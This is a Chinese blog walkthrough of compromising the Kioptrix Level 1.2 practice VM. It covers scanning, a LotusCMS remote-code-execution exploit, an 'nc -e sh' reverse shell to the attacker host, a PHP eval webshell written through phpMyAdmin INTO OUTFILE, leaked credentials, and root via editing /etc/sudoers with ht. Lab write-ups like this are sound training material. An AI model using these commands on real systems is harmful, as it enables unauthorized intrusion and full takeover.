十三の博客
0%

KIOPTRIX: LEVEL 1.2 (#3)

发表于 更新于 分类于

KIOPTRIX: LEVEL 1.2 (#3)

部署

下载下来之后发现有个readme文件,需要我们修改本地的hosts文件才可以。

image-20221101161401477

image-20221101162146121

信息收集

刚刚部署的时候我扫过ip了

这次的ip地址是192.168.100.152

那还是一样的操作,直接上nmap

1
nmap -A 192.168.100.152

扫出来22和80

那直接访问进去看看

访问进去看看直接就是gallery CMS嘛,找一下相关漏洞的利用

image-20221101171609240

找了一下,只有一个存储xss,我要这个有什么用?又登录不上靶机的后台(官方没给密码)

然后用dirb扫了下目录

1
dirb http://kioptrix3.com

突然发现我最熟悉的phpmyadmin(#^.^#)

image-20221101172149849

可惜没有密码,居然不是root

然后来到后台,指纹识别看看

1
whatweb http://kioptrix3.com/index.php?system=Admin

image-20221101172918557

image-20221101172911758

漏洞利用1-lotuscms-rce

发现lotuscms

百度发现这么个东西

image-20221101173311076

同时要是在kali上面搜索的话,也会发现有相关的利用

image-20221101173327066

这是我百度出来的利用结果,那就直接利用一下

image-20221101173445479

image-20221101173618356

那还是直接弹一个nc回来

但是可以执行ls命令,却弹不了nc

image-20221101174939665

dnslog也可以,说明命令执行是没有错的。

后来试了很多命令,发现最初的弹nc的命令并没有成功,这里我用的这个弹过来的。

1
2
nc -lvnp 6666 #攻击机
nc -e sh 192.168.100.129 6666 #受害机

提权

image-20221101175341698

目前是网站的权限,但是之前我们扫到了phpmyadmin,那个应该就是root权限,我们直接去相对的目录下找到配置文件看密码就可以了。

在当前目录下的gallery下gconfig.php文件中有密码

image-20221101175751913

密码是fuckeyou(不文明警告(#^.^#)

接下来就是登陆phpmyadmin,参考以前的博文

select '<?php @eval($_POST[a]);?>'INTO OUTFILE '/home/www/kioptrix3.com/test.php'

直接差一个webshell进去看看

image-20221101180821604

结果也没有权限,这时候才想起去看sql中的数据表

image-20221101181412344

有两个用户,之前22ssh服务打开的,可以用这两个用户去看看

1
2
dreg  Mast3r
loneferret  starwars

image-20221101182141573

通过sudo -l命令发现loneferret账号可以执行哪些命令

如果当前用户拥有ht权限,那么可以通过修改命令文件的内容来进行提权

1
2
3
4
export TERM=xterm-color(将显示内容变成彩色
sudo /usr/local/bin/ht
f3
/etc/sudoers

image-20221101183320702

在选中处添加,/bin/bash

F2保存,F10退出

此时再使用命令sudo提权至root权限

1
sudo /bin/bash

image-20221101183448920

image-20221101183642895

成功拿下权限!

总结

也是先找ip,扫端口,进入web页面找nday,利用nday,ht提权。

宏观的讲就是信息收集,进机器,拿权限。